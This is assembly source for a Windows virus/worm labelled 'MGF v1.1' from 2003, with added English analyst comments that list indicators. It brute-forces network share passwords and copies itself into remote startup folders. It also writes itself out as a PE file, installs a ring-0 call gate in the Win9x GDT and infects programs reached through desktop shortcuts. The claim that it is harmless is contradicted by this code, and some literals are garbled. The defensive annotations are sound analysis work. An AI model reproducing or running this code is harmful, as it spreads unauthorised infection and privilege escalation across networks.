
📄 bingdu.txt

📁 这是一个病毒源代码(这个病毒没有杀伤力)
add edx,[edx+3ch]
mov edx,[edx+78h]
add edx,_hModule
mov ecx,[edx+18h]
mov esi,[edx+20h]
mov edi,_lpszProcName 

push edi
push ecx
xor eax,eax
mov ecx,0ffffffffh
repnz scasb
not ecx
dec ecx
mov @dwSize,ecx ;计算函数名的长度
pop ecx
pop edi 

add esi,_hModule
@@:
push edi
push ecx
mov ecx,@dwSize
lodsd
add eax,_hModule
xchg eax,esi
repz cmpsb
xchg eax,esi 
pop ecx
pop edi
loopnz @b 

.if !ZERO?
xor eax,eax
ret
.endif 

sub esi,_hModule
sub esi,4
sub esi,[edx+20h]
shr esi,1
add esi,[edx+24h]
add esi,_hModule
lodsd
movzx eax,ax
shl eax,2
add eax,[edx+1ch]
add eax,_hModule
mov edx,[eax]
add edx,_hModule
xchg edx,eax 

ret
_GetProcAddress endp 

; thread that infects the LAN (original comment)
;-----------------------------------------------------------------------
; _GoLAN - thread routine: enumerate network resources and try to copy
; the dropped file onto every share it manages to connect to.
; Analyst notes (defender view, derived only from the code below):
;   * share password guessing: WNetAddConnection is retried with
;     successive strings from _GenPassWord for as long as it returns
;     56h (ERROR_INVALID_PASSWORD); a burst of such failures from one
;     host is a detectable indicator
;   * persistence on the remote host: szSFile is copied to szDFile, a
;     path under the remote "Start Menu\Programs\<startup>" folder,
;     through the drive letter in szLocalDrive ("x:")
; In:    lParam (not used by the visible code)
; Out:   nothing; pushad/popad preserve all registers
; Uses:  ebx = load delta (runtime address - link-time address); every
;        dw*/sz* global is addressed as name[ebx]
;-----------------------------------------------------------------------
_GoLAN proc lParam
local @hEnum                           ; handle from WNetOpenEnum
local @dwcCount                        ; in/out entry count for WNetEnumResource
local @szResourceName[32]:byte         ; remote name + 'C', rebuilt per entry
local @szBuffer[0c00h]:byte            ; NETRESOURCE array, dwBufferSize bytes
pushad 

; delta-offset trick: "call $+5" / "pop ebx" leaves the runtime address
; of the pop in ebx; subtracting its link-time address ($-1) gives the
; relocation delta used for every global reference below
db 0e8h,0,0,0,0
pop ebx
sub ebx,$-1 

; WNetOpenEnum(5, 0, 13h, 0, &@hEnum) -- args pushed right to left;
; 5 and 13h are dwScope/dwUsage values (Win32 constants, not named here)
lea eax,@hEnum
push eax
push 0
push 13h
push 0
push 5
call dwWNetOpenEnum[ebx] 

.if !eax                               ; 0 = NO_ERROR
.repeat
mov @dwcCount,-1                       ; -1 = as many entries as fit
; WNetEnumResource(@hEnum, &@dwcCount, @szBuffer, &dwBufferSize)
lea eax,dwBufferSize[ebx]
push eax
lea eax,@szBuffer
push eax
lea eax,@dwcCount
push eax
push @hEnum
call dwWNetEnumResource[ebx]
; offset 14h of the first NETRESOURCE is lpRemoteName; a non-NULL
; name means something was returned -> leave the loop via @f
cmp dword ptr [@szBuffer+14h],0
jnz @f
.until eax                             ; loop again while the call returned 0
push @hEnum
call dwWNetCloseEnum[ebx]
.endif
jmp _GoLANexit                         ; open failed or nothing enumerated

@@:
push @hEnum
call dwWNetCloseEnum[ebx]
lea edi,@szBuffer                      ; edi -> current NETRESOURCE entry

_NextPC:
push edi
; copy lpRemoteName into @szResourceName, then overwrite its NUL with
; the dword 'C' (bytes 'C',0,0,0): appends one 'C' and re-terminates
mov esi,[edi+14h]
lea edi,@szResourceName
@@:
lodsb
stosb
or al,al
jnz @b
mov dword ptr [edi-1],'C'
pop edi 

xor eax,eax
mov dwPassword[ebx],eax                ; restart the password sequence at 0

@@:
; WNetAddConnection(@szResourceName, eax = password ptr or NULL, "x:")
; the first attempt passes eax = 0 (no password); later attempts pass
; the pointer _GenPassWord leaves in eax
lea edx,szLocalDrive[ebx]
push edx
push eax
lea edx,@szResourceName
push edx
call dwWNetAddConnection[ebx]
.if eax==56h                           ; 56h = ERROR_INVALID_PASSWORD
call _GenPassWord                      ; eax -> next candidate string
cmp dwPassword[ebx],0                  ; 0 only after the counter wraps
jnz @b
.elseif !eax                           ; connected: x: now maps the share

; CopyFileA(szSFile, szDFile, 0) -> remote startup folder
push 0
lea eax,szDFile[ebx]
push eax
lea eax,szSFile[ebx]
push eax
call dwCopyFile[ebx] ; if a writable share was found, infect it (original comment)
mov esi,eax                            ; esi = CopyFile result

; WNetCancelConnection("x:", 1 = force)
push 1
lea eax,szLocalDrive[ebx]
push eax
call dwWNetCancelConnection[ebx]
call _GenPassWord
or esi,esi
jz @b                                  ; copy failed: retry with the next password

.endif 

add edi,20h                            ; sizeof(NETRESOURCE) -> next entry
dec @dwcCount
jnz _NextPC 

_GoLANexit:
popad
ret
_GoLAN endp 

; --- globals used by _GoLAN / _MemToFile / _GenPassWord (addressed as name[ebx]) ---
; The fixed file name, paths and drive letter below are plain-text
; values and serve as static indicators for this sample.
szMemToFileName db 'UnBlaster.exe',0   ; name of the dropped file (see _MemToFile); 14 bytes incl. NUL
szSFile db 'c:\windows\system\UnBlaster.exe',0   ; CopyFile source: the local dropped copy
szDFile db 'X:\WINDOWS\All Users\Start Menu\Programs\启动\UnBlaster.exe',0   ; CopyFile destination: startup folder of the host mapped on X:

dwPassword dd 0                        ; _GenPassWord counter; 0 restarts the sequence
dd 0,0                                 ; 8 bytes of room: _GenPassWord writes digits backwards from szPassword-1 into here
szPassword db 0                        ; NUL terminator; the generated string ends here
szLocalDrive db 'x:',0                 ; local name for WNetAddConnection / WNetCancelConnection
dwBufferSize dd 0c00h                  ; size of _GoLAN's @szBuffer, passed to WNetEnumResource

;-----------------------------------------------------------------------
; _GenPassWord - build the next password candidate (helper for _GoLAN).
; The original comment says the password uses the characters
; 1234567890!@#$%^; the mapping below actually yields '!'..'&' (21h-26h)
; for digit values 0-5 and '0'..'9' for values 6-15.
; Algorithm: dwPassword is written in base 16, least significant digit
; first, backwards from szPassword-1 (DF set), so the finished string
; reads forwards from the final edi. dwPassword is then incremented.
; In:    ebx = load delta
; Out:   eax = pointer to the NUL-terminated candidate (the pushad'd eax
;        slot at [esp+1ch] is patched before popad); dwPassword += 1;
;        all other registers preserved; DF cleared on exit
;-----------------------------------------------------------------------
_GenPassWord: ; password-generating subroutine; original note: characters 1234567890!@#$%^ (see header)
std                                    ; DF=1: stosb walks downwards

pushad
lea edi,[ebx+szPassword-1]             ; last digit goes just before the NUL
xor edx,edx
mov eax,dwPassword[ebx]
mov ecx,16                             ; radix

@@:
div ecx                                ; edx:eax / 16 -> eax = quotient, edx = remainder
xchg eax,edx                           ; al = digit value, edx = quotient
.if al<=5
add al,21h                             ; 0..5  -> '!' '"' '#' '$' '%' '&'
.else ;if al>=6 && al<=15
add al,2ah                             ; 6..15 -> '0'..'9'
.endif
stosb
xor eax,eax
xchg eax,edx                           ; eax = quotient, edx = 0 for the next div
or eax,eax
jnz @b 

inc edi                                ; edi -> first character of the string
inc dwPassword[ebx]
mov [esp+20h-4],edi                    ; overwrite the saved eax (pushad slot) -> returned in eax
popad 

cld
ret 


;-----------------------------------------------------------------------
; _MemToFile - write the in-memory virus body out as a standalone PE
; file "<system dir>\UnBlaster.exe" (original comment: "subroutine that
; restores the virus itself").
; Analyst notes: the written image carries two fixed values set below -
; e_lfanew (offset 3ch) = 0a8h and the marker 'FGM' at DOS-header
; offset 20h; the PE header is copied from the FileHead template.
; In:    ebx = load delta; hKernel32, VirusSize, VirusStart, VirusExit
;        and FileHead are defined elsewhere (not all visible here)
; Out:   nothing; eax/ecx/edx/esi/edi clobbered (no pushad in this proc)
;-----------------------------------------------------------------------
_MemToFile proc ; subroutine that restores the virus itself to a file
local @hFile
local @hFileMap
local @lpFileMap
local @lpSystemDir[40h]:byte           ; path buffer, 40h bytes

; GetSystemDirectoryA(@lpSystemDir, 40h); eax = length written
push 40h
lea edi,@lpSystemDir
push edi
call dwGetSystemDirectory[ebx]
;invoke GetSystemDirectory,addr @lpSystemDir,100h
add edi,eax
mov al,''                              ; NOTE(review): this character literal is garbled in this copy of the listing
stosb
lea esi,szMemToFileName[ebx]
mov ecx,16                             ; 'UnBlaster.exe',0 is 14 bytes; the 2 extra bytes land after the NUL (buffer is 40h)
rep movsb 

; CreateFileA(path, GENERIC_READ|GENERIC_WRITE, 0, 0, CREATE_ALWAYS (2), FILE_ATTRIBUTE_NORMAL (80h), 0)
push 0
push 80h
push 2
push 0
push 0
push 0c0000000h
lea eax,@lpSystemDir
push eax
call dwCreateFileA[ebx]
;invoke CreateFile,addr @lpSystemDir,0c0000000h,0,0,2,80h,0
.if eax!=0ffffffffh                    ; INVALID_HANDLE_VALUE
mov @hFile,eax 

mov edx,VirusSize
add edx,200h                           ; file size = 200h of headers + body

; CreateFileMapping(hFile, 0, PAGE_READWRITE (4), 0, edx, 0)
push 0
push edx
push 0
push 4
push 0
push eax
call dwCreateFileMapping[ebx]
;invoke CreateFileMapping,eax,0,4,0,edx,0
.if eax
mov @hFileMap,eax 

; MapViewOfFile(hMap, FILE_MAP_READ|FILE_MAP_WRITE (6), 0, 0, 0)
push 0
push 0
push 0
push 6
push eax
call dwMapViewOfFile[ebx]
;invoke MapViewOfFile,eax,6,0,0,0
.if eax
mov @lpFileMap,eax 

; lay out the image in the view: eax = view base, edi = write cursor
; 0a8h + 120h + 38h = 200h bytes of headers, then the body
mov edi,eax
mov esi,hKernel32[ebx]
mov ecx,0a8h
rep movsb ; first 0a8h bytes: DOS header/stub taken from the loaded KERNEL32 (original comment)
mov dword ptr [eax+3ch],0a8h           ; e_lfanew: PE header right after the stub
mov dword ptr [eax+20h],'FGM'          ; marker in the DOS header's reserved area
lea esi,FileHead[ebx]
mov ecx,120h
rep movsb ; 120h-byte PE header template (original comment: "original PE header")
xor eax,eax
mov ecx,38h
rep stosb                              ; zero padding up to offset 200h
lea esi,VirusStart[ebx]
mov ecx,VirusSize
push edi
rep movsb ; the virus body (original comment: "virus code")
pop edi                                ; edi -> start of the copied body
mov esi,offset VirusExit-offset VirusStart
mov dword ptr [edi+esi],offset VirusExit+4   ; patch one dword in the copy at VirusExit with a link-time address (no delta)

push @lpFileMap
call dwUnmapViewOfFile[ebx]
;invoke UnmapViewOfFile,@lpFileMap
.endif 

push @hFileMap
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFileMap
.endif 

push @hFile
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFile
.endif 

ret
_MemToFile endp 


;-----------------------------------------------------------------------
; _ProcessImportTab - resolve the API table by hand (original comment:
; "manually process the imported functions").
; Walks FunctionNameTab (dd entries holding link-time offsets, relocated
; with ebx) and fills FunctionAddressTab in the same order:
;   0ffffffffh -> the next entry is a DLL name: LoadLibrary, ecx = hModule
;   other != 0 -> GetProcAddress(ecx, name), result stored with stosd
;   0          -> end of table
; The loop also ends as soon as a LoadLibrary/GetProcAddress call
; returns 0 ("or eax,eax" tests the last result), leaving the remaining
; slots untouched.
; Requires dwLoadLibrary and dwGetProcAddress (the first two slots) to
; be filled beforehand - presumably by the _GetProcAddress routine that
; is cut off at the top of this listing.
; Analyst note: the DLL and API names are plain text, so this resolver
; is easy to fingerprint statically.
; In:    ebx = load delta     Out: eax = 0 on normal exit; ecx/esi/edi clobbered
;-----------------------------------------------------------------------
_ProcessImportTab: ; manually process the imported functions
lea esi,FunctionNameTab[ebx]           ; esi -> name-table cursor
lea edi,FunctionAddressTab[ebx]        ; edi -> address-slot cursor
@@:
lodsd 

.if eax==0ffffffffh                    ; DLL marker
lodsd
add eax,ebx                            ; relocate "offset szXxx"
push eax
call dwLoadLibrary[ebx]
mov ecx,eax                            ; ecx = module handle for the names that follow

.elseif eax                            ; function-name entry
add eax,ebx
push ecx                               ; keep hModule across the call
push eax                               ; lpProcName
push ecx                               ; hModule
call dwGetProcAddress[ebx]
stosd                                  ; FunctionAddressTab[i] = resolved address
pop ecx
.endif 

or eax,eax                             ; 0 terminator (or a failed lookup) ends the loop
jnz @b 

ret 


;-----------------------------------------------------------------------
; _IsWindows9x - on Win9x, install a call gate in the GDT (original
; comment: "subroutine that adds a CALLGATE to WIN98's GDT").
; Entry condition: the body runs only when ZF is clear on entry, i.e.
; the caller's flags decide (presumably a version test done before the
; call; not visible here).
; What it does: sgdt reads the GDTR (limit, base) from user mode, picks
; the selector of the last 8-byte descriptor with RPL 3, stores it in
; CallGateSel, and - unless lar already reports access byte 0ech -
; writes a descriptor there with offset = dwC3Address (set by
; _GetC3Address), selector 28h and access byte 0ech.
; Analyst notes: this only has an effect where the GDT is writable from
; ring 3 (Win9x); NT-family kernels are not affected. A user-mode sgdt
; followed by writes through the GDT base is a strong privilege-
; escalation indicator.
; In:    ebx = load delta, flags from the caller
; Out:   CallGateSel[ebx] set; ecx/edx/edi clobbered
;-----------------------------------------------------------------------
_IsWindows9x: ; subroutine that adds a CALLGATE to WIN98's GDT
.if !ZERO? ;win9x
xor ecx,ecx
push ecx
push cx                                ; 6-byte slot on the stack for the GDTR
sgdt fword ptr [esp]
pop cx                                 ; cx  = GDT limit
pop edi                                ; edi = GDT linear base
sub ecx,8
and cl,0f8h                            ; offset of the last descriptor, 8-byte aligned
or cl,3                                ; RPL 3
mov CallGateSel[ebx],ecx 

xor edx,edx
lar edx,ecx                            ; dh = access-rights byte of that descriptor

.if dh!=0ech                           ; not already a present, DPL-3, 32-bit call gate
and cl,0f8h
mov edx,dwC3Address[ebx]
mov word ptr [edi+ecx],dx              ; gate offset bits 15:0
shr edx,16
mov word ptr [edi+ecx+6],dx            ; gate offset bits 31:16
mov dword ptr [edi+ecx+2],0ec000028h   ; selector 28h, param count 0, access 0ech
.endif 

.endif
ret 


;-----------------------------------------------------------------------
; _GetModuleAddress - walk downwards page by page from an address inside
; a module until an 'MZ' header whose e_lfanew points at 'PE' is found.
; In:    eax = any address inside the module
; Out:   eax = module base; ecx = eax + e_lfanew (PE header address)
; Notes: there is no lower bound - if no header is found the loop keeps
; reading lower pages (and would fault on unmapped memory); "and ax"
; is a 16-bit partial-register op that only clears bits 0-11.
;-----------------------------------------------------------------------
_GetModuleAddress:
@@:
and ax,0f000h                          ; page-align (clear the low 12 bits)
sub eax,1000h                          ; previous page
cmp word ptr [eax],'ZM'                ; "MZ" DOS signature
jnz @b
mov ecx,eax
add ecx,[ecx+3ch]                      ; e_lfanew
cmp dword ptr [ecx],'EP'               ; "PE",0,0 signature
jnz @b
ret 


;-----------------------------------------------------------------------
; _GetC3Address - find the first 0c3h (ret opcode) byte in the module at
; hKernel32, scanning up to 20000h bytes from base+1000h, and store its
; address in dwC3Address (read later by _IsWindows9x).
; In:    ebx = load delta, hKernel32[ebx] = module base
; Out:   dwC3Address[ebx]; eax/ecx/edi clobbered; DF cleared
; Note:  ZF is not checked after repnz - if no 0c3h byte lies in the
; range, the address of the last byte scanned is stored instead.
;-----------------------------------------------------------------------
_GetC3Address:
mov edi,hKernel32[ebx]
add edi,1000h                          ; skip the first page (headers)
mov ecx,20000h                         ; scan length
mov al,0c3h                            ; byte to look for
cld
repnz scasb
dec edi                                ; scasb advanced past the match; step back onto it
mov dwC3Address[ebx],edi
ret 


; FunctionAddressTab - resolved API addresses, one dd per name in
; FunctionNameTab, in the same order. Filled by _ProcessImportTab
; (stosd), except that dwLoadLibrary and dwGetProcAddress must already
; hold valid addresses before _ProcessImportTab runs. All calls in this
; file go through these slots as "call dwXxx[ebx]".
; Note: several names without an A/W suffix resolve to the W variant
; (see the strings in FunctionNameTab): dwCreateProcess, dwCreateFile,
; dwGetFileAttributes, dwSetFileAttributes.
FunctionAddressTab:
dwLoadLibrary dd 0                     ; LoadLibraryA - must be set before _ProcessImportTab
dwGetProcAddress dd 0                  ; GetProcAddress - must be set before _ProcessImportTab
dwGetVersion dd 0
dwCloseHandle dd 0
dwCreateProcess dd 0                   ; CreateProcessW
dwCreateFile dd 0                      ; CreateFileW
dwGetFileAttributes dd 0               ; GetFileAttributesW
dwSetFileAttributes dd 0               ; SetFileAttributesW
dwCreateFileA dd 0
dwGetFileAttributesA dd 0
dwSetFileAttributesA dd 0
dwGetSystemDirectory dd 0              ; GetSystemDirectoryA
dwCreateFileMapping dd 0               ; CreateFileMappingA
dwCreateThread dd 0
dwGetFileSize dd 0
dwGetFileTime dd 0
dwSetFileTime dd 0
dwGetFileType dd 0
dwGetLocalTime dd 0
dwCopyFile dd 0                        ; CopyFileA
dwMapViewOfFile dd 0
dwUnmapViewOfFile dd 0
dwFindFirstFile dd 0                   ; FindFirstFileA
dwFindNextFile dd 0                    ; FindNextFileA
dwFindClose dd 0
dwMessageBox dd 0                      ; MessageBoxA (user32)
dwRegCloseKey dd 0                     ; advapi32 from here
dwRegCreateKeyEx dd 0
dwRegOpenKeyEx dd 0
dwRegQueryvalueEx dd 0
dwRegSetvalueEx dd 0
dwWNetAddConnection dd 0               ; mpr from here
dwWNetCancelConnection dd 0
dwWNetCloseEnum dd 0
dwWNetEnumResource dd 0
dwWNetOpenEnum dd 0 


_OtherMemPosition: ; start of the second 2K half that stays resident elsewhere (original comment)


; FunctionNameTab - input table for _ProcessImportTab. Each entry is a
; link-time "offset szXxx" (relocated with ebx at run time):
;   0ffffffffh  marks that the next entry is a DLL name (LoadLibrary)
;   0           terminates the table
; The order of the function entries is the order of FunctionAddressTab.
; Note: szUser32 is referenced below but is not defined in the visible
; listing (the szUSER32 line in the string block is commented out).
FunctionNameTab:
dd 0ffffffffh                          ; --- kernel32.dll ---
dd offset szKernel32
dd offset szLoadLibraryA
dd offset szGetProcAddress
dd offset szGetVersion
dd offset szCloseHandle
dd offset szCreateProcess
dd offset szCreateFile
dd offset szGetFileAttributes
dd offset szSetFileAttributes
dd offset szCreateFileA
dd offset szGetFileAttributesA
dd offset szSetFileAttributesA
dd offset szGetSystemDirectoryA
dd offset szCreateFileMappingA
dd offset szCreateThread
dd offset szGetFileSize
dd offset szGetFileTime
dd offset szSetFileTime
dd offset szGetFileType
dd offset szGetLocalTime
dd offset szCopyFileA
dd offset szMapViewOfFile
dd offset szUnmapViewOfFile
dd offset szFindFirstFileA
dd offset szFindNextFileA
dd offset szFindClose
dd 0ffffffffh                          ; --- user32 ---
dd offset szUser32
dd offset szMessageBoxA
dd 0ffffffffh                          ; --- ADVAPI32.dll ---
dd offset szADVAPI32
dd offset szRegCloseKey
dd offset szRegCreateKeyExA
dd offset szRegOpenKeyExA
dd offset szRegQueryvalueExA
dd offset szRegSetvalueExA
dd 0ffffffffh                          ; --- MPR.dll ---
dd offset szMPR
dd offset szWNetAddConnectionA
dd offset szWNetCancelConnectionA
dd offset szWNetCloseEnum
dd offset szWNetEnumResourceA
dd offset szWNetOpenEnumA
dd 0                                   ; end of table

; DLL and API names referenced by FunctionNameTab. They are stored in
; plain text, so this block is a ready-made static signature for the
; sample (e.g. the WNet* / Reg* combination together with the strings
; in the data blocks below).
szKernel32 db 'kernel32.dll',0
szLoadLibraryA db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
szGetVersion db 'GetVersion',0
szCloseHandle db 'CloseHandle',0
szCreateProcess db 'CreateProcessW',0   ; W variant behind the unsuffixed dwCreateProcess slot
szCreateFile db 'CreateFileW',0         ; W variant behind dwCreateFile
szGetFileAttributes db 'GetFileAttributesW',0
szSetFileAttributes db 'SetFileAttributesW',0
szCreateFileA db 'CreateFileA',0
szGetFileAttributesA db 'GetFileAttributesA',0
szSetFileAttributesA db 'SetFileAttributesA',0
szGetSystemDirectoryA db 'GetSystemDirectoryA',0
szCreateFileMappingA db 'CreateFileMappingA',0
szCreateThread db 'CreateThread',0
szGetFileSize db 'GetFileSize',0
szGetFileTime db 'GetFileTime',0
szSetFileTime db 'SetFileTime',0
szGetFileType db 'GetFileType',0
szGetLocalTime db 'GetLocalTime',0
szCopyFileA db 'CopyFileA',0
szMapViewOfFile db 'MapViewOfFile',0
szUnmapViewOfFile db 'UnmapViewOfFile',0
szFindFirstFileA db 'FindFirstFileA',0
szFindNextFileA db 'FindNextFileA',0
szFindClose db 'FindClose',0
;szUSER32 db 'USER32.dll',0            ; commented out; szUser32 used by FunctionNameTab is not defined in the visible listing
szMessageBoxA db 'MessageBoxA',0
szADVAPI32 db 'ADVAPI32.dll',0
szRegCloseKey db 'RegCloseKey',0
szRegCreateKeyExA db 'RegCreateKeyExA',0
szRegOpenKeyExA db 'RegOpenKeyExA',0
szRegQueryvalueExA db 'RegQueryvalueExA',0
szRegSetvalueExA db 'RegSetvalueExA',0
szMPR db 'MPR.dll',0
szWNetAddConnectionA db 'WNetAddConnectionA',0
szWNetCancelConnectionA db 'WNetCancelConnectionA',0
szWNetCloseEnum db 'WNetCloseEnum',0
szWNetEnumResourceA db 'WNetEnumResourceA',0
szWNetOpenEnumA db 'WNetOpenEnumA',0 


;-----------------------------------------------------------------------
; _EditLnkFile - for every *.lnk in the user's Desktop folder, extract
; the path string embedded in the shortcut and hand it to _EditFile
; (defined elsewhere, not in this listing) unless it is filtered out
; (original comment: "subroutine that infects desktop shortcuts").
; Steps: read HKCU\<szRegKeyDesktop>\Desktop -> directory; append
; "*.lnk"; FindFirstFile/FindNextFile; each file is opened read-only,
; mapped, and searched from offset 65h for a repeat of the 3 bytes at
; that offset; the NUL-terminated string found there is copied out;
; strings whose bytes 2..4 case-fold to "WIN" (or "PRO" when dwVersion,
; set elsewhere, is 0) are skipped.
; Analyst notes: the .lnk files themselves are only mapped read-only
; here; what reaches _EditFile is the executable path taken from each
; shortcut. The registry read of the Desktop shell folder followed by a
; FindFirstFile on "*.lnk" is the observable sequence.
; In:    ebx = load delta
; Out:   nothing; pushad/popad preserve all registers
; Locals: @hFile is reused - first as the HKEY, then as the file handle
;-----------------------------------------------------------------------
_EditLnkFile proc ; subroutine that infects desktop shortcuts
local @hFile                           ; HKEY, later the .lnk file handle
local @hFileMap
local @lpFileMap
local @hFindFile
local @dwFileSize                      ; nFileSizeLow of the current .lnk
local @dwBufferSize                    ; length of the directory prefix (incl. trailing separator)
local @lpBuffer[80h]:byte              ; "<desktop dir><sep>*.lnk"
local @stWin32FindData:WIN32_FIND_DATA ; also reused as scratch for the full path / extracted string
pushad 

; RegOpenKeyEx(HKEY_CURRENT_USER (80000001h), szRegKeyDesktop, 0, 1 (KEY_QUERY_VALUE), &@hFile)
lea eax,@hFile
push eax
push 1
push 0
lea eax,szRegKeyDesktop[ebx]
push eax
push 80000001h
call dwRegOpenKeyEx[ebx]
.if !eax 

; RegQueryValueEx(hKey, "Desktop", 0, 0, @lpBuffer, &@dwBufferSize); @dwBufferSize = 80h in, bytes read out
mov @dwBufferSize,80h
lea eax,@dwBufferSize
push eax
lea eax,@lpBuffer
push eax
push 0 
push 0
lea eax,szDesktopvalue[ebx]
push eax
push @hFile
call dwRegQueryvalueEx[ebx] 

push @hFile
call dwRegCloseKey[ebx] 

; @dwBufferSize counts the NUL: drop it, make sure the path ends with a
; separator (the character literal is garbled in this copy of the
; listing), then append "*.lnk",0 with two dword stores
; ('nl.*' = bytes '*','.','l','n'; 'k' = bytes 'k',0,0,0)
dec @dwBufferSize
lea edi,@lpBuffer
add edi,@dwBufferSize
.if byte ptr [edi-1]!=''
mov al,''
stosb
inc @dwBufferSize
.endif
mov eax,'nl.*'
stosd
mov eax,'k'
stosd 

; FindFirstFile(@lpBuffer, &@stWin32FindData)
lea eax,@stWin32FindData
push eax
lea eax,@lpBuffer
push eax
call dwFindFirstFile[ebx] ; find the first .lnk file (original comment)
;invoke FindFirstFile,addr @lpBuffer,addr @stWin32FindData
.if eax!=INVALID_HANDLE_VALUE
mov @hFindFile,eax
.repeat 

mov eax,dword ptr [@stWin32FindData+20h]   ; nFileSizeLow
mov @dwFileSize,eax 

; build the full path in place: copy the @dwBufferSize-byte directory
; prefix to just before cFileName (offset 2ch of WIN32_FIND_DATA), so
; edi -> "<dir><sep><name>"; this overwrites the preceding struct fields
mov ecx,@dwBufferSize
lea edi,@stWin32FindData+2ch
sub edi,ecx
lea esi,@lpBuffer
push edi
rep movsb
pop edi 

; CreateFileA(path, GENERIC_READ, FILE_SHARE_READ (1), 0, OPEN_EXISTING (3), FILE_ATTRIBUTE_NORMAL (80h), 0)
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push edi
call dwCreateFileA[ebx]
;invoke CreateFile,edi,80000000h,1,0,3,80h,0
.if eax!=0ffffffffh                    ; INVALID_HANDLE_VALUE (written numerically here, symbolically above)
mov @hFile,eax 

; CreateFileMapping(hFile, 0, PAGE_READONLY (2), 0, 0, 0)
push 0
push 0
push 0
push 2
push 0
push eax
call dwCreateFileMapping[ebx]
;invoke CreateFileMapping,eax,0,2,0,0,0
.if eax
mov @hFileMap,eax 

; MapViewOfFile(hMap, FILE_MAP_READ (4), 0, 0, 0)
push 0
push 0
push 0
push 4
push eax
call dwMapViewOfFile[ebx]
;invoke MapViewOfFile,eax,4,0,0,0
.if eax
mov @lpFileMap,eax 

; look for a later repeat of the 3 bytes at offset 65h: esi stays at
; view+65h, edi advances one byte per iteration, at most size-66h
; times (which .lnk fields these offsets correspond to is not stated
; in the code)
lea esi,[eax+65h]
mov edi,esi
mov ecx,@dwFileSize
sub ecx,66h
@@:
inc edi
push esi
push edi
push ecx
mov ecx,3
repz cmpsb ; copy the EXE path out of the *.lnk file (original comment)
pop ecx
pop edi
pop esi
loopnz @b 

.if ZERO? && byte ptr [edi+3]          ; match found and the byte after it is non-NUL
; copy the NUL-terminated string at the match into @stWin32FindData,
; bounded by the bytes left in the file; edi -> that copy afterwards
mov esi,edi
sub edi,@lpFileMap
mov ecx,@dwFileSize
sub ecx,edi
lea edi,@stWin32FindData
push edi
@@:
lodsb
stosb
or al,al
loopnz @b
pop edi
mov eax,[edi+2]
and eax,0dfdfdfdfh                     ; case-fold bytes 2..5 (bit 5 cleared)
.if eax=='NIW'                         ; bytes 2..4 = "WIN" and byte 5 folds to 0 -> skip
xor edi,edi
.else
.if !dwVersion[ebx] && eax=='ORP'      ; likewise "PRO" when dwVersion is 0 -> skip
xor edi,edi
.endif
.endif 

.else
xor edi,edi                            ; no match: nothing to hand on for this .lnk
.endif 

push @lpFileMap
call dwUnmapViewOfFile[ebx]
;invoke UnmapViewOfFile,@lpFileMap
.endif 

push @hFileMap
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFileMap
.endif 

push @hFile
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFile
.endif 

; edi is either 0, the extracted string, or - when the open/map calls
; above failed - still the full .lnk path built earlier
.if edi
push 7
push edi
call _EditFile ; conditions met: infect (original comment; _EditFile is not in this listing)
.endif 

; FindNextFile(@hFindFile, &@stWin32FindData) refills the struct used as scratch above
lea eax,@stWin32FindData
push eax
push @hFindFile
call dwFindNextFile[ebx] ; keep searching for .lnk files (original comment)
;invoke FindNextFile,@hFindFile,addr @stWin32FindData
.until eax==0
push @hFindFile
call dwFindClose[ebx]
;invoke FindClose,@hFindFile
.endif 

.endif 

popad
ret
_EditLnkFile endp
; registry key and value name read by _EditLnkFile (HKCU shell folders,
; "Desktop"). The page rendering wrapped the first literal onto two
; lines; in the source it is a single 'Software\...\Shell Folders' string.
szRegKeyDesktop db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell 
Folders',0
szDesktopvalue db 'Desktop',0 


; message-box strings (Chinese; the line breaks inside the literals come
; from the page rendering). Rough translation: title "Declaration of Mo
; Guofang's technology envoy"; text "This envoy came to spread technology
; and has set up camp here. I have no destructive power, do not worry!" /
; "To my idol Bill Gates: several of your foolish staff dismissed my
; vulnerability report, you should spank them!".
; The version, copyright and e-mail strings are fixed plain-text
; markers of this sample.
szMessageTit db '莫国防的技术使者之宣言',0
szMessageText db '本使者为传播技术而来,已在这里安营扎寨。我无破坏力,你不必
担心!',13,10
db '致我的偶像比尔.盖茨:你的几个傻瓜手下,轻视我的漏洞报告,你该打他们的
PP!',0 

szVer db 'Name: MGF v1.1',0            ; "MGF" also appears as the 'FGM' marker _MemToFile writes at DOS-header offset 20h
address db '(C) NN.CN (P) 2003-10-08',0
email db 'wohoo2002@hotmail.com',0 


FileHead db 120h dup(255) ; virus PE header template copied by _MemToFile; original comment: "must be filled in by hand, only space is reserved here" (120h bytes of 0ffh)


; minimal import directory (original comment: "import table; without it
; 2000/XP/2003 refuse to load and run the file - mandatory").
; One IMAGE_IMPORT_DESCRIPTOR for kernel32.dll importing ExitProcess,
; followed by an all-zero terminating descriptor. RVAs are formed by
; subtracting the hard-coded image base 400000h from link-time offsets.
ImportDirItem: ; import table; without it 2000/XP/2003 refuse to load and execute - mandatory
dd offset FirstThunk0-400000h          ; OriginalFirstThunk (import name table)
dd 0                                   ; TimeDateStamp
dd 0                                   ; ForwarderChain
dd offset szKernel32-400000h           ; Name
dd offset FirstThunk1-400000h          ; FirstThunk (import address table)
dd 5 dup(0)                            ; terminating descriptor

FirstThunk0:
dd offset szFunctionName-400000h       ; -> hint/name entry below
dd 0 

FirstThunk1:
dd offset szFunctionName-400000h       ; IAT slot, overwritten by the loader
dd 0 

szFunctionName:
dw 75h                                 ; export hint
db 'ExitProcess',0,0,0 


VirusEnd: ; end of the virus image (VirusStart is defined earlier, outside this listing)
end VirusStart                         ; program entry point
